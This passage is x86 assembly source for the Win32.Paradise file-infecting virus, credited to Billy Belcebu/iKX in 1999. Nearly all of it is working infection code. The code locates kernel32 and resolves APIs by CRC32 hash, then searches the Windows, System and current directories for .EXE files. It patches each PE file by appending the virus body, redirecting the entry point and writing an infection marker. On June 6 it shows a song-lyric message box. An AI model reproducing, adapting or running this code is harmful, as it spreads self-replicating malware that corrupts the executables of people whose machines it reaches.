inc reg ; CMP reg,0FFFFFFFFh
jz joff1 ; JZ joff1
dec reg ; The code is reduced in 3
endm ; bytes (7-4)
apicall macro apioff ; Optimize muthafucka!
call dword ptr [ebp+apioff]
endm
.data
szTitle db "Paradise v1.00",0
szMessage db "Paradise - Visions - Stratovarius",10
db "Virus size............"
db virus_size/1000 mod 10 + "0"
db virus_size/0100 mod 10 + "0"
db virus_size/0010 mod 10 + "0"
db virus_size/0001 mod 10 + "0"
db " bytes",0
db "Copyright (c) 1999 by Billy Belcebu/iKX",0
.code
; ??----?????? ?
; : Paradise virus - Virus startz here :
; ? ??????---???
virus_start label byte
Paradise:
pushad ; Push all da shit
pushfd
call delta_ ; Hardest code to undestand ;)
delta: db "[iKX4EVER" ; Yeah... iKX :)
delta_: pop ebp
mov eax,ebp
sub ebp,offset delta
sub eax,shit_size ; Obtain at runtime the
sub eax,00001000h ; imagebase of the process
NewEIP equ $-4
mov dword ptr [ebp+ModBase],eax
call ChangeSEH ; SEH rlz :)
mov esp,[esp+08h]
jmp RestoreSEH
ChangeSEH:
xor ebx,ebx
push dword ptr fs:[ebx]
mov fs:[ebx],esp
mov esi,[esp+2Ch] ; Get program return address
and esi,0FFFF0000h ; Align to page
mov ecx,5
call GetK32
mov dword ptr [ebp+kernel],eax ; EAX must be K32 base address
lea esi,[ebp+@@NamezCRC32]
lea edi,[ebp+@@Offsetz]
call GetAPIs ; Retrieve all APIs
call PrepareInfection
call InfectItAll
call payload
or ebp,ebp ; Is 1st gen?
jz fakehost
RestoreSEH:
xor ebx,ebx
pop dword ptr fs:[ebx]
pop eax
popfd
popad
mov ebx,12345678h
org $-4
OldEIP dd 00001000h
add ebx,12345678h
org $-4
ModBase dd 00400000h
push ebx
ret
; ??----?????? ?
; : Paradise virus - Retrieve directories to infect :
; ? ??????---???
PrepareInfection:
lea edi,[ebp+WindowsDir]
push 7Fh
push edi
apicall _GetWindowsDirectoryA
add edi,7Fh
push 7Fh
push edi
apicall _GetSystemDirectoryA
add edi,7Fh
push edi
push 7Fh
apicall _GetCurrentDirectoryA
ret
; ??----?????? ?
; : Paradise virus - Infect windows, windows\system and the current dir :
; ? ??????---???
InfectItAll:
lea edi,[ebp+directories]
mov byte ptr [ebp+mirrormirror],dirs2inf
requiem:
push edi
apicall _SetCurrentDirectoryA
push edi
call Infect
pop edi
add edi,7Fh
dec byte ptr [ebp+mirrormirror]
cmp byte ptr [ebp+mirrormirror],00h
jnz requiem
ret
; ??----?????? ?
; : Paradise virus - Searching... Seek and infect! :
; ? ??????---???
Infect: and dword ptr [ebp+infections],00000000h ; reset countah
lea eax,[ebp+offset WIN32_FIND_DATA] ; Find's shit
push eax
lea eax,[ebp+offset EXE_MASK]
push eax
apicall _FindFirstFileA
cmp_ eax,FailInfect
mov dword ptr [ebp+SearchHandle],eax
__1: push dword ptr [ebp+ModBase]
push dword ptr [ebp+OldEIP]
push dword ptr [ebp+NewEIP]
call Infection
pop dword ptr [ebp+NewEIP]
pop dword ptr [ebp+OldEIP]
pop dword ptr [ebp+ModBase]
inc byte ptr [ebp+infections]
cmp byte ptr [ebp+infections],n_infections
jz FailInfect
__2: lea edi,[ebp+WFD_szFileName]
mov ecx,MAX_PATH
xor al,al
rep stosb
lea eax,[ebp+offset WIN32_FIND_DATA]
push eax
push dword ptr [ebp+SearchHandle]
apicall _FindNextFileA
or eax,eax
jz CloseSearchHandle
jmp __1
CloseSearchHandle:
push dword ptr [ebp+SearchHandle]
apicall _FindClose
FailInfect:
ret
; ??----?????? ?
; : Paradise virus - Infect found file :
; ? ??????---???
Infection:
lea esi,[ebp+WFD_szFileName] ; Get FileName to infect
push 80h
push esi
apicall _SetFileAttributesA ; Wipe its attributes
call OpenFile ; Open it
cmp_ eax,CantOpen
mov dword ptr [ebp+FileHandle],eax
mov ecx,dword ptr [ebp+WFD_nFileSizeLow] ; 1st we create map with
call CreateMap ; its exact size
cmp_ eax,CloseFile
mov dword ptr [ebp+MapHandle],eax
mov ecx,dword ptr [ebp+WFD_nFileSizeLow]
call MapFile ; Map it
cmp_ eax,UnMapFile
mov dword ptr [ebp+MapAddress],eax
mov esi,eax ; Get PE Header
mov esi,[esi+3Ch]
add esi,eax
cmp dword ptr [esi],"EP" ; Is it PE?
jnz NoInfect
cmp dword ptr [esi+mark],"SDRP" ; Was it infected?
jz NoInfect
push dword ptr [esi+3Ch]
push dword ptr [ebp+MapAddress] ; Close all
apicall _UnmapViewOfFile
push dword ptr [ebp+MapHandle]
apicall _CloseHandle
pop ecx
mov eax,dword ptr [ebp+WFD_nFileSizeLow] ; And Map all again.
add eax,virus_size
call Align
xchg ecx,eax
call CreateMap
cmp_ eax,CloseFile
mov dword ptr [ebp+MapHandle],eax
mov ecx,dword ptr [ebp+NewSize]
call MapFile
cmp_ eax,UnMapFile
mov dword ptr [ebp+MapAddress],eax
mov esi,eax ; Get PE Header
mov esi,[esi+3Ch]
add esi,eax
mov edi,esi
movzx eax,word ptr [edi+06h]
dec eax
imul eax,eax,28h
add esi,eax
add esi,78h
mov edx,[edi+74h]
shl edx,3
add esi,edx
mov eax,[edi+28h]
mov dword ptr [ebp+OldEIP],eax
mov edx,[esi+10h]
mov ebx,edx
add edx,[esi+14h]
push edx
mov eax,ebx
add eax,[esi+0Ch]
mov [edi+28h],eax
mov dword ptr [ebp+NewEIP],eax
mov eax,[esi+10h]
add eax,virus_size
mov ecx,[edi+3Ch]
call Align
mov [esi+10h],eax
mov [esi+08h],eax
pop edx
mov eax,[esi+10h]
add eax,[esi+0Ch]
mov [edi+50h],eax
or dword ptr [esi+24h],section_flags
mov dword ptr [edi+mark],"SDRP"
lea esi,[ebp+Paradise]
xchg edi,edx
add edi,dword ptr [ebp+MapAddress]
mov ecx,virus_size
rep movsb
jmp UnMapFile
NoInfect:
dec byte ptr [ebp+infections]
mov ecx,dword ptr [ebp+WFD_nFileSizeLow]
call TruncFile
UnMapFile:
push dword ptr [ebp+MapAddress]
apicall _UnmapViewOfFile
CloseMap:
push dword ptr [ebp+MapHandle]
apicall _CloseHandle
CloseFile:
push dword ptr [ebp+FileHandle]
apicall _CloseHandle
CantOpen:
push dword ptr [ebp+WFD_dwFileAttributes]
lea eax,[ebp+WFD_szFileName]
push eax
apicall _SetFileAttributesA
ret
; ??----?????? ?
; : Paradise virus - Get KERNEL32.DLL base address (simplest method) :
; ? ??????---???
GetK32 proc
_@1: jecxz WeFailed
cmp word ptr [esi],"ZM"
jz CheckPE
_@2: sub esi,10000h
dec ecx
jmp _@1
CheckPE:
mov edi,[esi+3Ch]
add edi,esi
cmp dword ptr [edi],"EP"
jz WeGotK32
jmp _@2
WeFailed:
mov ecx,cs
xor cl,cl
jecxz WeAreInWNT
mov esi,kernel_
jmp WeGotK32
WeAreInWNT:
mov esi,kernel_wNT
WeGotK32:
xchg eax,esi
ret
GetK32 endp
; ??----?????? ?
; : Paradise virus - Get all API addresses :
; ? ??????---???
GetAPIs proc
@@1: lodsd ; Get in EAX the CRC32 of API
push esi
push edi
call GetAPI_ET_CRC32
pop edi
pop esi
stosd ; Save in [EDI] the API address
cmp byte ptr [esi],0BBh ; Last API?
jz @@4 ; Yeah, get outta here
jmp @@1 ; Nein, loop again
@@4: ret
GetAPIs endp
GetAPI_ET_CRC32 proc
xor edx,edx
xchg eax,edx ; Put CRC32 of da api in EDX
mov word ptr [ebp+Counter],ax ; Reset counter
mov esi,3Ch
add esi,[ebp+kernel] ; Get PE header of KERNEL32
lodsw
add eax,[ebp+kernel] ; Normalize
mov esi,[eax+78h] ; Get a pointer to its
add esi,1Ch ; Export Table
add esi,[ebp+kernel]
lea edi,[ebp+AddressTableVA] ; Pointer to the address table
lodsd ; Get AddressTable value
add eax,[ebp+kernel] ; Normalize
stosd ; And store in its variable
lodsd ; Get NameTable value
add eax,[ebp+kernel] ; Normalize
push eax ; Put it in stack
stosd ; Store in its variable
lodsd ; Get OrdinalTable value
add eax,[ebp+kernel] ; Normalize
stosd ; Store
pop esi ; ESI = NameTable VA
@?_3: push esi ; Save again
lodsd ; Get pointer to an API name
add eax,[ebp+kernel] ; Normalize
xchg edi,eax ; Store ptr in EDI
mov ebx,edi ; And in EBX
push edi ; Save EDI
xor al,al ; Reach the null character
scasb ; that marks us the end of
jnz $-1 ; the api name
pop esi ; ESI = Pointer to API Name
sub edi,ebx ; EDI = API Name size
push edx ; Save API's CRC32
call CRC32 ; Get actual api's CRC32
pop edx ; Restore API's CRC32
cmp edx,eax ; Are them equal?
jz @?_4 ; if yes, we got it
pop esi ; Restore ptr to api name
add esi,4 ; Get the next
inc word ptr [ebp+Counter] ; And increase the counter
jmp @?_3 ; Get another api!
@?_4:
pop esi ; Remove shit from stack
movzx eax,word ptr [ebp+Counter] ; AX = Counter
shl eax,1 ; *2 (it's an array of words)
add eax,dword ptr [ebp+OrdinalTableVA] ; Normalize
xor esi,esi ; Clear ESI
xchg eax,esi ; ESI = Ptr 2 ordinal; EAX = 0
lodsw ; Get ordinal in AX
shl eax,2 ; And with it we go to the
add eax,dword ptr [ebp+AddressTableVA] ; AddressTable (array of
xchg esi,eax ; dwords)
lodsd ; Get Address of API RVA
add eax,[ebp+kernel] ; and normalize!! That's it!
ret
GetAPI_ET_CRC32 endp
; ??----?????? ?
; : Paradise virus - Some useful subroutines :
; ? ??????---???
Align proc
push edx
xor edx,edx
push eax
div ecx
pop eax
sub ecx,edx
add eax,ecx
pop edx
ret
Align endp
TruncFile proc
xor eax,eax
push eax
push eax
push ecx
push dword ptr [ebp+FileHandle]
apicall _SetFilePointer
push dword ptr [ebp+FileHandle]
apicall _SetEndOfFile
ret
TruncFile endp
OpenFile proc
xor eax,eax
push eax
push eax
push 00000003h
push eax
inc eax
push eax
push 80000000h or 40000000h
push esi
apicall _CreateFileA
ret
OpenFile endp
CreateMap proc
xor eax,eax
push eax
push ecx
push eax
push 00000004h
push eax
push dword ptr [ebp+FileHandle]
apicall _CreateFileMappingA
ret
CreateMap endp
MapFile proc
xor eax,eax
push ecx
push eax
push eax
push 00000002h
push dword ptr [ebp+MapHandle]
apicall _MapViewOfFile
ret
MapFile endp
CRC32 proc
cld
xor ecx,ecx ; Optimized by me - 2 bytes
dec ecx ; less
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi ; Another fool byte less
jnz NextByteCRC
not edx
not ecx
mov eax,edx
rol eax,16
mov ax,cx
ret
CRC32 endp
payload proc
lea eax,[ebp+SYSTEMTIME]
push eax
apicall _GetSystemTime
cmp word ptr [ebp+ST_wMonth],6 ; On the sixth month...
jnz no_payload
cmp word ptr [ebp+ST_wDay],6 ; On the sixth day...
jnz no_payload
lea eax,[ebp+szUSER32]
push eax
apicall _LoadLibraryA
call @?_1
db "MessageBoxA",0
@?_1: push eax
apicall _GetProcAddress
push 00001000h
lea ebx,[ebp+mark_]
push ebx
lea ebx,[ebp+song]
push ebx
push 00000000h
call eax
no_payload:
ret
payload endp
; ??----?????? ?
; : Paradise virus - Virus data :
; ? ??????---???
mark_ db "[Win32.Paradise v1.00]",0
song db "Late at night i found myself again",10
db "wondering and watching TV",10
db "I can't believe what's on the screen",10
db "something that i wouldn't like to see",10
db "Many rare species will perish soon",10
db "and we'll be short on food",10
db "Why do we have to be so selfish",10
db "we have to change our attitude",10
db "I know that i am not",10
db "the only one that's worried",10
db "Why don't we all",10
db "wake up, and and realize",10
db "Like the birds in the sky",10
db "we are flying so high",10
db "without making anykind of sacrifice",10
db "We've got so little time",10
db "to undo this crime",10
db "or we'll lose our paradise",10
db "It seems to me that there's no sense at all",10
db "nobody cares, it's always the same",10
db "Mother nature's crying out in pain",10
db "I know we are the ones to blame",10,10
db "Paradise [ Stratovarius ]",0
db "Copyright (c) 1999 by Billy Belcebu/iKX",0
EXE_MASK db "*.EXE",0
szUSER32 db "USER32",0
@@NamezCRC32 label byte
@FindFirstFileA dd 0AE17EBEFh
@FindNextFileA dd 0AA700106h
@FindClose dd 0C200BE21h
@CreateFileA dd 08C892DDFh
@DeleteFileA dd 0DE256FDEh
@SetFilePointer dd 085859D42h
@SetFileAttributesA dd 03C19E536h
@CloseHandle dd 068624A9Dh
@GetCurrentDirectoryA dd 0EBC6C18Bh
@SetCurrentDirectoryA dd 0B2DBD7DCh
@GetWindowsDirectoryA dd 0FE248274h
@GetSystemDirectoryA dd 0593AE7CEh
@CreateFileMappingA dd 096B2D96Ch
@MapViewOfFile dd 0797B49ECh
@UnmapViewOfFile dd 094524B42h
@SetEndOfFile dd 059994ED6h
@GetProcAddress dd 0FFC97C1Fh
@LoadLibraryA dd 04134D1ADh
@GetSystemTime dd 075B7EBE8h
db 0BBh
align dword
virus_end label byte
heap_start label byte
kernel dd kernel_
infections dd 00000000h
NewSize dd 00000000h
SearchHandle dd 00000000h
FileHandle dd 00000000h
MapHandle dd 00000000h
MapAddress dd 00000000h
AddressTableVA dd 00000000h
NameTableVA dd 00000000h
OrdinalTableVA dd 00000000h
Counter dw 0000h
@@Offsetz label byte
_FindFirstFileA dd 00000000h
_FindNextFileA dd 00000000h
_FindClose dd 00000000h
_CreateFileA dd 00000000h
_DeleteFileA dd 00000000h
_SetFilePointer dd 00000000h
_SetFileAttributesA dd 00000000h
_CloseHandle dd 00000000h
_GetCurrentDirectoryA dd 00000000h
_SetCurrentDirectoryA dd 00000000h
_GetWindowsDirectoryA dd 00000000h
_GetSystemDirectoryA dd 00000000h
_CreateFileMappingA dd 00000000h
_MapViewOfFile dd 00000000h
_UnmapViewOfFile dd 00000000h
_SetEndOfFile dd 00000000h
_GetProcAddress dd 00000000h
_LoadLibraryA dd 00000000h
_GetSystemTime dd 00000000h
MAX_PATH equ 260
FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS
WIN32_FIND_DATA label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db MAX_PATH dup (?)
WFD_szAlternateFileName db 13 dup (?)
db 03 dup (?)
directories label byte
WindowsDir db 7Fh dup (00h)
SystemDir db 7Fh dup (00h)
OriginDir db 7Fh dup (00h)
dirs2inf equ (($-directories)/7Fh)
mirrormirror db dirs2inf
SYSTEMTIME label byte
ST_wYear dw ?
ST_wMonth dw ?
ST_wDayOfWeek dw ?
ST_wDay dw ?
ST_wHour dw ?
ST_wMinute dw ?
ST_wSecond dw ?
ST_wMilliseconds dw ?
heap_end label byte
fakehost:
pop dword ptr fs:[0]
pop eax
popfd
popad
xor eax,eax
push eax
push offset szTitle
push offset szMessage
push eax
call MessageBoxA
push 00000000h
call ExitProcess
end Paradise
; Komandos de autodefensa animal!

Some files were not shown because too many files have changed in this diff Show More